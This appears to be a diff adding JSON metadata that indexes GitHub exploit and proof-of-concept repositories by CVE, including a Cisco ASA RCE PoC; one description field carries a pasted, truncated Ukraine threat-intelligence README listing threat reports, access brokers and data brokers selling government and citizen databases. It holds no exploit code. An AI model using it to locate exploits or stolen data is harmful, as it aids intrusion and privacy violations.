+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1497.json b/2021/CVE-2021-1497.json
new file mode 100644
index 0000000000..a571f1a2ec
--- /dev/null
+++ b/2021/CVE-2021-1497.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 577662602,
+ "name": "APT-Backpack",
+ "full_name": "34zY\/APT-Backpack",
+ "owner": {
+ "login": "34zY",
+ "id": 55347142,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4",
+ "html_url": "https:\/\/github.com\/34zY"
+ },
+ "html_url": "https:\/\/github.com\/34zY\/APT-Backpack",
+ "description": "cve-2019-11510, cve-2019-19781, cve-2020-5902, cve-2021-1497, cve-2021-20090, cve-2021-22006, cve-2021-22205, cve-2021-26084, cve-2021-26855, cve-2021-26857, cve-2021–26857, cve-2021–26858, cve-2021–26865",
+ "fork": false,
+ "created_at": "2022-12-13T08:41:44Z",
+ "updated_at": "2024-01-19T09:21:57Z",
+ "pushed_at": "2023-04-19T17:10:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1585.json b/2021/CVE-2021-1585.json
new file mode 100644
index 0000000000..977a02e69d
--- /dev/null
+++ b/2021/CVE-2021-1585.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 457959361,
+ "name": "staystaystay",
+ "full_name": "jbaines-r7\/staystaystay",
+ "owner": {
+ "login": "jbaines-r7",
+ "id": 91965877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4",
+ "html_url": "https:\/\/github.com\/jbaines-r7"
+ },
+ "html_url": "https:\/\/github.com\/jbaines-r7\/staystaystay",
+ "description": "Proof of Concept for CVE-2021-1585: Cisco ASA Device Manager RCE",
+ "fork": false,
+ "created_at": "2022-02-10T21:52:24Z",
+ "updated_at": "2023-10-18T07:49:23Z",
+ "pushed_at": "2022-08-15T18:13:20Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cisco",
+ "cve-2021-1585",
+ "exploit",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1636.json b/2021/CVE-2021-1636.json
new file mode 100644
index 0000000000..bca180628e
--- /dev/null
+++ b/2021/CVE-2021-1636.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 466052267,
+ "name": "bug-free-memory",
+ "full_name": "Nate0634034090\/bug-free-memory",
+ "owner": {
+ "login": "Nate0634034090",
+ "id": 95479220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95479220?v=4",
+ "html_url": "https:\/\/github.com\/Nate0634034090"
+ },
+ "html_url": "https:\/\/github.com\/Nate0634034090\/bug-free-memory",
+ "description": " ![logo](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ci-logo.png) # Ukraine-Cyber-Operations Curated Intelligence is working with analysts from around the world to provide useful information to organisations in Ukraine looking for additional free threat intelligence. Slava Ukraini. Glory to Ukraine. ([Blog](https:\/\/www.curatedintel.org\/2021\/08\/welcome.html) | [Twitter](https:\/\/twitter.com\/CuratedIntel) | [LinkedIn](https:\/\/www.linkedin.com\/company\/curatedintelligence\/)) ![timeline](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/uacyberopsv2.png) ![cyberwar](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/Russia-Ukraine%20Cyberwar.png) ### Analyst Comments: - 2022-02-25 - Creation of the initial repository to help organisations in Ukraine - Added [Threat Reports](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#threat-reports) section - Added [Vendor Support](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#vendor-support) section - 2022-02-26 - Additional resources, chronologically ordered (h\/t Orange-CD) - Added [Vetted OSINT Sources](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#vetted-osint-sources) section - Added [Miscellaneous Resources](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations#miscellaneous-resources) section - 2022-02-27 - Additional threat reports have been added - Added [Data Brokers](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/README.md#data-brokers) section - Added [Access Brokers](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/README.md#access-brokers) section - 2022-02-28 - Added Russian Cyber Operations Against Ukraine Timeline by ETAC - Added Vetted and Contextualized [Indicators of Compromise (IOCs)](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ETAC_Vetted_UkraineRussiaWar_IOCs.csv) by ETAC - 2022-03-01 - Additional threat reports and resources have been added - 2022-03-02 - Additional [Indicators of Compromise (IOCs)](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2011) have been added - Added vetted [YARA rule collection](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/tree\/main\/yara) from the Threat Reports by ETAC - Added loosely-vetted [IOC Threat Hunt Feeds](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/tree\/main\/KPMG-Egyde_Ukraine-Crisis_Feeds\/MISP-CSV_MediumConfidence_Filtered) by KPMG-Egyde CTI (h\/t [0xDISREL](https:\/\/twitter.com\/0xDISREL)) - IOCs shared by these feeds are `LOW-TO-MEDIUM CONFIDENCE` we strongly recommend NOT adding them to a blocklist - These could potentially be used for `THREAT HUNTING` and could be added to a `WATCHLIST` - IOCs are generated in `MISP COMPATIBLE` CSV format - 2022-03-03 - Additional threat reports and vendor support resources have been added - Updated [Log4Shell IOC Threat Hunt Feeds](https:\/\/github.com\/curated-intel\/Log4Shell-IOCs\/tree\/main\/KPMG_Log4Shell_Feeds) by KPMG-Egyde CTI; not directly related to Ukraine, but still a widespread vulnerability. - Added diagram of Russia-Ukraine Cyberwar Participants 2022 by ETAC - Additional [Indicators of Compromise (IOCs)](https:\/\/github.com\/curated-intel\/Ukraine-Cyber-Operations\/blob\/main\/ETAC_Vetted_UkraineRussiaWar_IOCs.csv#L2042) have been added #### `Threat Reports` | Date | Source | Threat(s) | URL | | --- | --- | --- | --- | | 14 JAN | SSU Ukraine | Website Defacements | [ssu.gov.ua](https:\/\/ssu.gov.ua\/novyny\/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy)| | 15 JAN | Microsoft | WhisperGate wiper (DEV-0586) | [microsoft.com](https:\/\/www.microsoft.com\/security\/blog\/2022\/01\/15\/destructive-malware-targeting-ukrainian-organizations\/) | | 19 JAN | Elastic | WhisperGate wiper (Operation BleedingBear) | [elastic.github.io](https:\/\/elastic.github.io\/security-research\/malware\/2022\/01\/01.operation-bleeding-bear\/article\/) | | 31 JAN | Symantec | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [symantec-enterprise-blogs.security.com](https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/shuckworm-gamaredon-espionage-ukraine) | | 2 FEB | RaidForums | Access broker \"GodLevel\" offering Ukrainain algricultural exchange | RaidForums [not linked] | | 2 FEB | CERT-UA | UAC-0056 using SaintBot and OutSteel malware | [cert.gov.ua](https:\/\/cert.gov.ua\/article\/18419) | | 3 FEB | PAN Unit42 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [unit42.paloaltonetworks.com](https:\/\/unit42.paloaltonetworks.com\/gamaredon-primitive-bear-ukraine-update-2021\/) | | 4 FEB | Microsoft | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [microsoft.com](https:\/\/www.microsoft.com\/security\/blog\/2022\/02\/04\/actinium-targets-ukrainian-organizations\/) | | 8 FEB | NSFOCUS | Lorec53 (aka UAC-0056, EmberBear, BleedingBear) | [nsfocusglobal.com](https:\/\/nsfocusglobal.com\/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government) | | 15 FEB | CERT-UA | DDoS attacks against the name server of government websites as well as Oschadbank (State Savings Bank) & Privatbank (largest commercial bank). False SMS and e-mails to create panic | [cert.gov.ua](https:\/\/cert.gov.ua\/article\/37139) | | 23 FEB | The Daily Beast | Ukrainian troops receive threatening SMS messages | [thedailybeast.com](https:\/\/www.thedailybeast.com\/cyberattacks-hit-websites-and-psy-ops-sms-messages-targeting-ukrainians-ramp-up-as-russia-moves-into-ukraine) | | 23 FEB | UK NCSC | Sandworm\/VoodooBear (GRU) | [ncsc.gov.uk](https:\/\/www.ncsc.gov.uk\/files\/Joint-Sandworm-Advisory.pdf) | | 23 FEB | SentinelLabs | HermeticWiper | [sentinelone.com]( https:\/\/www.sentinelone.com\/labs\/hermetic-wiper-ukraine-under-attack\/ ) | | 24 FEB | ESET | HermeticWiper | [welivesecurity.com](https:\/\/www.welivesecurity.com\/2022\/02\/24\/hermeticwiper-new-data-wiping-malware-hits-ukraine\/) | | 24 FEB | Symantec | HermeticWiper, PartyTicket ransomware, CVE-2021-1636, unknown webshell | [symantec-enterprise-blogs.security.com](https:\/\/symantec-enterprise-blogs.security.com\/blogs\/threat-intelligence\/ukraine-wiper-malware-russia) | | 24 FEB | Cisco Talos | HermeticWiper | [blog.talosintelligence.com](https:\/\/blog.talosintelligence.com\/2022\/02\/threat-advisory-hermeticwiper.html) | | 24 FEB | Zscaler | HermeticWiper | [zscaler.com](https:\/\/www.zscaler.com\/blogs\/security-research\/hermetic-wiper-resurgence-targeted-attacks-ukraine) | | 24 FEB | Cluster25 | HermeticWiper | [cluster25.io](https:\/\/cluster25.io\/2022\/02\/24\/ukraine-analysis-of-the-new-disk-wiping-malware\/) | | 24 FEB | CronUp | Data broker \"FreeCivilian\" offering multiple .gov.ua | [twitter.com\/1ZRR4H](https:\/\/twitter.com\/1ZRR4H\/status\/1496931721052311557)| | 24 FEB | RaidForums | Data broker \"Featherine\" offering diia.gov.ua | RaidForums [not linked] | | 24 FEB | DomainTools | Unknown scammers | [twitter.com\/SecuritySnacks](https:\/\/twitter.com\/SecuritySnacks\/status\/1496956492636905473?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | | 25 FEB | @500mk500 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [twitter.com\/500mk500](https:\/\/twitter.com\/500mk500\/status\/1497339266329894920?s=20&t=opOtwpn82ztiFtwUbLkm9Q) | | 25 FEB | @500mk500 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [twitter.com\/500mk500](https:\/\/twitter.com\/500mk500\/status\/1497208285472215042)| | 25 FEB | Microsoft | HermeticWiper | [gist.github.com](https:\/\/gist.github.com\/fr0gger\/7882fde2b1b271f9e886a4a9b6fb6b7f) | | 25 FEB | 360 NetLab | DDoS (Mirai, Gafgyt, IRCbot, Ripprbot, Moobot) | [blog.netlab.360.com](https:\/\/blog.netlab.360.com\/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days\/) | | 25 FEB | Conti [themselves] | Conti ransomware, BazarLoader | Conti News .onion [not linked] | | 25 FEB | CoomingProject [themselves] | Data Hostage Group | CoomingProject Telegram [not linked] | | 25 FEB | CERT-UA | UNC1151\/Ghostwriter (Belarus MoD) | [CERT-UA Facebook](https:\/\/facebook.com\/story.php?story_fbid=312939130865352&id=100064478028712)| | 25 FEB | Sekoia | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com\/sekoia_io](https:\/\/twitter.com\/sekoia_io\/status\/1497239319295279106) | | 25 FEB | @jaimeblascob | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com\/jaimeblasco](https:\/\/twitter.com\/jaimeblascob\/status\/1497242668627370009)| | 25 FEB | RISKIQ | UNC1151\/Ghostwriter (Belarus MoD) | [community.riskiq.com](https:\/\/community.riskiq.com\/article\/e3a7ceea\/) | | 25 FEB | MalwareHunterTeam | Unknown phishing | [twitter.com\/malwrhunterteam](https:\/\/twitter.com\/malwrhunterteam\/status\/1497235270416097287) | | 25 FEB | ESET | Unknown scammers | [twitter.com\/ESETresearch](https:\/\/twitter.com\/ESETresearch\/status\/1497194165561659394) | | 25 FEB | BitDefender | Unknown scammers | [blog.bitdefender.com](https:\/\/blog.bitdefender.com\/blog\/hotforsecurity\/cybercriminals-deploy-spam-campaign-as-tens-of-thousands-of-ukrainians-seek-refuge-in-neighboring-countries\/) | | 25 FEB | SSSCIP Ukraine | Unkown phishing | [twitter.com\/dsszzi](https:\/\/twitter.com\/dsszzi\/status\/1497103078029291522) | | 25 FEB | RaidForums | Data broker \"NetSec\" offering FSB (likely SMTP accounts) | RaidForums [not linked] | | 25 FEB | Zscaler | PartyTicket decoy ransomware | [zscaler.com](https:\/\/www.zscaler.com\/blogs\/security-research\/technical-analysis-partyticket-ransomware) | | 25 FEB | INCERT GIE | Cyclops Blink, HermeticWiper | [linkedin.com](https:\/\/www.linkedin.com\/posts\/activity-6902989337210740736-XohK) [Login Required] | | 25 FEB | Proofpoint | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com\/threatinsight](https:\/\/twitter.com\/threatinsight\/status\/1497355737844133895?s=20&t=Ubi0tb_XxGCbHLnUoQVp8w) | | 25 FEB | @fr0gger_ | HermeticWiper capabilities Overview | [twitter.com\/fr0gger_](https:\/\/twitter.com\/fr0gger_\/status\/1497121876870832128?s=20&t=_296n0bPeUgdXleX02M9mg) | 26 FEB | BBC Journalist | A fake Telegram account claiming to be President Zelensky is posting dubious messages | [twitter.com\/shayan86](https:\/\/twitter.com\/shayan86\/status\/1497485340738785283?s=21) | | 26 FEB | CERT-UA | UNC1151\/Ghostwriter (Belarus MoD) | [CERT_UA Facebook](https:\/\/facebook.com\/story.php?story_fbid=313517477474184&id=100064478028712) | | 26 FEB | MHT and TRMLabs | Unknown scammers, linked to ransomware | [twitter.com\/joes_mcgill](https:\/\/twitter.com\/joes_mcgill\/status\/1497609555856932864?s=20&t=KCIX_1Ughc2Fs6Du-Av0Xw) | | 26 FEB | US CISA | WhisperGate wiper, HermeticWiper | [cisa.gov](https:\/\/www.cisa.gov\/uscert\/ncas\/alerts\/aa22-057a) | | 26 FEB | Bloomberg | Destructive malware (possibly HermeticWiper) deployed at Ukrainian Ministry of Internal Affairs & data stolen from Ukrainian telecommunications networks | [bloomberg.com](https:\/\/www.bloomberg.com\/news\/articles\/2022-02-26\/hackers-destroyed-data-at-key-ukraine-agency-before-invasion?sref=ylv224K8) | | 26 FEB | Vice Prime Minister of Ukraine | IT ARMY of Ukraine created to crowdsource offensive operations against Russian infrastructure | [twitter.com\/FedorovMykhailo](https:\/\/twitter.com\/FedorovMykhailo\/status\/1497642156076511233) | | 26 FEB | Yoroi | HermeticWiper | [yoroi.company](https:\/\/yoroi.company\/research\/diskkill-hermeticwiper-a-disruptive-cyber-weapon-targeting-ukraines-critical-infrastructures) | | 27 FEB | LockBit [themselves] | LockBit ransomware | LockBit .onion [not linked] | | 27 FEB | ALPHV [themselves] | ALPHV ransomware | vHUMINT [closed source] | | 27 FEB | Mēris Botnet [themselves] | DDoS attacks | vHUMINT [closed source] | | 28 FEB | Horizon News [themselves] | Leak of China's Censorship Order about Ukraine | [TechARP](https:\/\/www-techarp-com.cdn.ampproject.org\/c\/s\/www.techarp.com\/internet\/chinese-media-leaks-ukraine-censor\/?amp=1)| | 28 FEB | Microsoft | FoxBlade (aka HermeticWiper) | [Microsoft](https:\/\/blogs.microsoft.com\/on-the-issues\/2022\/02\/28\/ukraine-russia-digital-war-cyberattacks\/?preview_id=65075) | | 28 FEB | @heymingwei | Potential BGP hijacks attempts against Ukrainian Internet Names Center | [https:\/\/twitter.com\/heymingwei](https:\/\/twitter.com\/heymingwei\/status\/1498362715198263300?s=20&t=Ju31gTurYc8Aq_yZMbvbxg) | | 28 FEB | @cyberknow20 | Stormous ransomware targets Ukraine Ministry of Foreign Affairs | [twitter.com\/cyberknow20](https:\/\/twitter.com\/cyberknow20\/status\/1498434090206314498?s=21) | | 1 MAR | ESET | IsaacWiper and HermeticWizard | [welivesecurity.com](https:\/\/www.welivesecurity.com\/2022\/03\/01\/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine\/) | | 1 MAR | Proofpoint | Ukrainian armed service member's email compromised and sent malspam containing the SunSeed malware (likely TA445\/UNC1151\/Ghostwriter) | [proofpoint.com](https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails) | | 1 MAR | Elastic | HermeticWiper | [elastic.github.io](https:\/\/elastic.github.io\/security-research\/intelligence\/2022\/03\/01.hermeticwiper-targets-ukraine\/article\/) | | 1 MAR | CrowdStrike | PartyTicket (aka HermeticRansom), DriveSlayer (aka HermeticWiper) | [CrowdStrike](https:\/\/www.crowdstrike.com\/blog\/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine\/) | | 2 MAR | Zscaler | DanaBot operators launch DDoS attacks against the Ukrainian Ministry of Defense | [zscaler.com](https:\/\/www.zscaler.com\/blogs\/security-research\/danabot-launches-ddos-attack-against-ukrainian-ministry-defense) | | 3 MAR | @ShadowChasing1 | Gamaredon\/Shuckworm\/PrimitiveBear (FSB) | [twitter.com\/ShadowChasing1](https:\/\/twitter.com\/ShadowChasing1\/status\/1499361093059153921) | | 3 MAR | @vxunderground | News website in Poland was reportedly compromised and the threat actor uploaded anti-Ukrainian propaganda | [twitter.com\/vxunderground](https:\/\/twitter.com\/vxunderground\/status\/1499374914758918151?s=20&t=jyy9Hnpzy-5P1gcx19bvIA) | | 3 MAR | @kylaintheburgh | Russian botnet on Twitter is pushing \"#istandwithputin\" and \"#istandwithrussia\" propaganda (in English) | [twitter.com\/kylaintheburgh](https:\/\/twitter.com\/kylaintheburgh\/status\/1499350578371067906?s=21) | | 3 MAR | @tracerspiff | UNC1151\/Ghostwriter (Belarus MoD) | [twitter.com](https:\/\/twitter.com\/tracerspiff\/status\/1499444876810854408?s=21) | #### `Access Brokers` | Date | Threat(s) | Source | | --- | --- | --- | | 23 JAN | Access broker \"Mont4na\" offering UkrFerry | RaidForums [not linked] | | 23 JAN | Access broker \"Mont4na\" offering PrivatBank | RaidForums [not linked] | | 24 JAN | Access broker \"Mont4na\" offering DTEK | RaidForums [not linked] | | 27 FEB | KelvinSecurity Sharing list of IP cameras in Ukraine | vHUMINT [closed source] | | 28 FEB | \"w1nte4mute\" looking to buy access to UA and NATO countries (likely ransomware affiliate) | vHUMINT [closed source] | #### `Data Brokers` | Threat Actor | Type | Observation | Validated | Relevance | Source | | --------------- | --------------- | --------------------------------------------------------------------------------------------------------- | --------- | ----------------------------- | ---------------------------------------------------------- | | aguyinachair | UA data sharing | PII DB of ukraine.com (shared as part of a generic compilation) | No | TA discussion in past 90 days | ELeaks Forum \\[not linked\\] | | an3key | UA data sharing | DB of Ministry of Communities and Territories Development of Ukraine (minregion\\[.\\]gov\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | an3key | UA data sharing | DB of Ukrainian Ministry of Internal Affairs (wanted\\[.\\]mvs\\[.\\]gov\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (40M) of PrivatBank customers (privatbank\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | DB of \"border crossing\" DBs of DPR and LPR | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (7.5M) of Ukrainian passports | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB of Ukrainian car registration, license plates, Ukrainian traffic police records | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (2.1M) of Ukrainian citizens | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (28M) of Ukrainian citizens (passports, drivers licenses, photos) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (1M) of Ukrainian postal\/courier service customers (novaposhta\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (10M) of Ukrainian telecom customers (vodafone\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (3M) of Ukrainian telecom customers (lifecell\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | CorelDraw | UA data sharing | PII DB (13M) of Ukrainian telecom customers (kyivstar\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | danieltx51 | UA data sharing | DB of Ministry of Foreign Affairs of Ukraine (mfa\\[.\\]gov\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | DueDiligenceCIS | UA data sharing | PII DB (63M) of Ukrainian citizens (name, DOB, birth country, phone, TIN, passport, family, etc) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | Featherine | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | FreeCivilian | UA data sharing | DB of Ministry for Internal Affairs of Ukraine public data search engine (wanted\\[.\\]mvs\\[.\\]gov\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | FreeCivilian | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\\[.\\]gov\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | FreeCivilian | UA data sharing | DB of Motor Insurance Bureau of Ukraine (mtsbu\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | FreeCivilian | UA data sharing | PII DB of Ukrainian digital-medicine provider (medstar\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | FreeCivilian | UA data sharing | DB of ticket.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of id.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of my.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of portal.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of anti-violence-map.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dopomoga.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of e-services.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of edu.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of education.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of ek-cbi.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mail.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of portal-gromady.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of web-minsoc.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of wcs-wim.dsbt.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of bdr.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of motorsich.com | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dsns.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mon.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of minagro.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of zt.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of kmu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dsbt.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of forest.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of nkrzi.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dabi.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of comin.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dp.dpss.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of esbu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mms.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mova.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mspu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of nads.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of reintegration.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of sies.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of sport.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mepr.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mfa.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of va.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mtu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of cg.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of ch-tmo.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of cp.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of cpd.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of hutirvilnij-mrc.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dndekc.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of visnyk.dndekc.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of dpvs.hsc.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of odk.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of e-driver\\[.\\]hsc\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of wanted\\[.\\]mvs\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of minregeion\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] 